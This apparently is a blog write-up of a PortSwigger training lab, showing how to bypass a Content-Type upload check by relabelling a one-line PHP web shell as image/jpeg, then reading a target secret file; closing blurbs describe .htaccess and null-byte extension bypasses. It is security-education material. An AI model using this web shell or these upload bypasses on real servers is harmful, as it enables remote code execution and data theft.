On this page
apsyleg1 min read
#portswigger #file-upload #rce #web-security
Web Shell Upload via Content-Type Restriction Bypass
Lab
Web shell upload via Content-Type restriction bypass · Apprentice
Solution
Given
This lab contains a vulnerable image upload function. It attempts to prevent users
from uploading unexpected file types, but relies on checking user-controllable
input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Analysis and recon
The server seems to only look at the Content-Type header and doesn't check the actual file format or extension. So we'll find the request, send the shell, then probe in Repeater.
Same shell:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Server response:
Sorry, file type application/x-php is not allowed
Only image/jpeg and image/png are allowed
Sorry, there was an error uploading your file.
Okay, let's try one of the allowed ones :) Worked with image/jpeg.
Trigger the shell:
https://0afc00240467710b80c4f3e900760037.web-security-academy.net/files/avatars/shell.php
nwBgzpEyfEbf0QPqvGNb4sCrrAyLNvmC
Lab solved!
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.